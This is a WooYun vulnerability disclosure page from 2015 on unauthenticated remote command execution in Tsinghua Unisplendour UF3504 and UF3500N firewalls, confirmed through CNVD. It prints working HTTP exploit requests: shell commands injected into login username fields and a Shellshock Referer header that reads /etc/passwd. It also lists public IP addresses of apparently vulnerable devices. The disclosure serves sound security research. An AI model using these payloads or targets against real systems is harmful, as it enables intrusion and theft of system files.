当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115756

漏洞标题:清华紫光某系列防火墙产品存在远程命令执行漏洞(非st2)

相关厂商:紫光股份有限公司

漏洞作者: YY-2012

提交时间:2015-05-24 13:20

修复时间:2015-08-26 18:16

公开时间:2015-08-26 18:16

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-24: 细节已通知厂商并且等待厂商处理中
2015-05-28: 厂商已经确认,细节仅向厂商公开
2015-05-31: 细节向第三方安全合作伙伴开放
2015-07-22: 细节向核心白帽子及相关领域专家公开
2015-08-01: 细节向普通白帽子公开
2015-08-11: 细节向实习白帽子公开
2015-08-26: 细节向公众公开

简要描述:

rt 无需登

详细说明:

发现不同型号,执行远程命令方式有所区别,但方法一样。(都是无需登录)
紫光防火墙UF3504 3.0版型号存在两处命令执行如下:
(一)存在任意命令执行:

POST /cgi-bin/UserManager HTTP/1.1
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
Host: 219.147.203.13
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
login=%b5%c7%c2%bc&action=useraction&passwd=123456&username=%22set%7cset%26set%22


参数username过滤不当导致命令执行以"set|set&set"为例。
(二)BASH远程命令执行漏洞

GET / HTTP/1.1
Referer: () { :;}; echo `/bin/cat /etc/passwd`
Host: 219.147.203.13
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


清华紫光UF3500N防火墙2.70版存在一处任意命令执行如下:

POST /cgi-bin/admin_login.cgi HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
Host: 125.46.98.90
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
login=%b9%dc%c0%ed%d4%b1%b5%c7%c2%bc&adminname=%22set%7cset%26set%22&adminpasswd=123456


参数adminname过滤不当导致命令执行以"set|set&set"为例。

漏洞证明:

案例:
紫光防火墙UF3504:
https://222.92.70.226/
https://222.182.213.95/
清华紫光防火墙UF3500N:
https://219.147.203.13/
https://211.137.166.50/
https://58.18.221.146/
https://125.46.98.90/


aaaaaaaaa11111111111111111.jpg


aaaaaaaaaaaa22222222222222222.jpg


aaaaaaaa3333333333333.jpg

修复方案:

联系厂商

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-05-28 18:14

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式向软件生产厂商通报。

最新状态:

暂无


漏洞评价:

评论